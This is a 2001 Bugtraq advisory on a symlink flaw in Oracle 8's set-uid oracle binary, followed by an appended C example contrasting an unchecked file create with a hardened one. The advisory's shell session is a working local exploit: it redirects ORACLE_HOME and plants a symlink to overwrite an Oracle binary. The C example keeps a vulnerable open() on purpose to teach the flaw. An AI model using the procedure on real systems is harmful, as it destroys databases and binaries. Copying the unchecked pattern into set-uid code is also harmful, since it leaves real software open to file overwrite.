Bugtraq mailing list archives

vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6


From: Juan Manuel Pascual Escriba <pask () plazasite com>
Date: Thu, 02 Aug 2001 09:57:26 +0200




                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested on Linux, but can be "exported" to others.

  Impact:     Any user can compromise any file owned by oracle (DDBB owner).

  Author:     Juan Manuel Pascual (pask () plazasite com)

  Status:     Vendor contacted on 18th July 2001

PROBLEM SUMMARY:
    There is a write permission checking error in the oracle binary that can
be used by local users to write any file owned by oracle.

IMPACT:
    Any user with local access can corrupt the database, overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

Only for educational purposes. (Corrupting a ddbb isn't an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc 
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log is my link .. and I overwrite the binary. What about dbf files, and so on ....
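
The session above comes down to a set-uid program creating a predictably named file in a directory the caller controls. As an added example (not code from the advisory or from Oracle), the C below contrasts an unchecked create with one that uses O_EXCL|O_NOFOLLOW under the caller's uid; the function names, the assumed form of the unchecked open() and the constructed "victim" file are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Unchecked create (assumed stand-in for what the session implies):
 * open() follows a link already planted at `path` and truncates its target. */
int open_trace_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0640);
}

/* Hardened create: O_EXCL fails with EEXIST if the name exists at all,
 * symlinks included; O_NOFOLLOW is a second guard on the final component. */
int open_trace_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0640);
}

/* In a set-uid program: create the file as the invoking user, then restore
 * the effective uid, so files of the binary's owner are never reachable. */
int open_trace_as_caller(const char *path) {
    uid_t saved = geteuid();
    if (seteuid(getuid()) != 0) return -1;
    int fd = open_trace_safe(path);
    if (seteuid(saved) != 0) { if (fd >= 0) close(fd); return -1; }
    return fd;
}

/* Constructed scenario: a link named like a trace file points at a victim.
 * Returns 1 if the victim was clobbered, 0 if intact, -1 on setup error. */
int planted_link_demo(int hardened) {
    char dir[] = "/tmp/trcdemoXXXXXX", victim[64], trace[64], buf[8] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(trace, sizeof trace, "%s/ora_24050.trc", dir);
    FILE *f = fopen(victim, "w");
    if (!f || fputs("binary", f) < 0 || fclose(f) != 0) return -1;
    if (symlink(victim, trace) != 0) return -1;
    int fd = hardened ? open_trace_as_caller(trace) : open_trace_naive(trace);
    if (fd >= 0) { if (write(fd, "trace\n", 6) != 6) return -1; close(fd); }
    if ((f = fopen(victim, "r")) != NULL) { if (fread(buf, 1, 6, f) != 6) buf[0] = 0; fclose(f); }
    unlink(trace); unlink(victim); rmdir(dir);
    return strcmp(buf, "binary") != 0;
}

int main(void) {
    printf("naive clobbered=%d, hardened clobbered=%d\n", planted_link_demo(0), planted_link_demo(1));
    return 0;
}
```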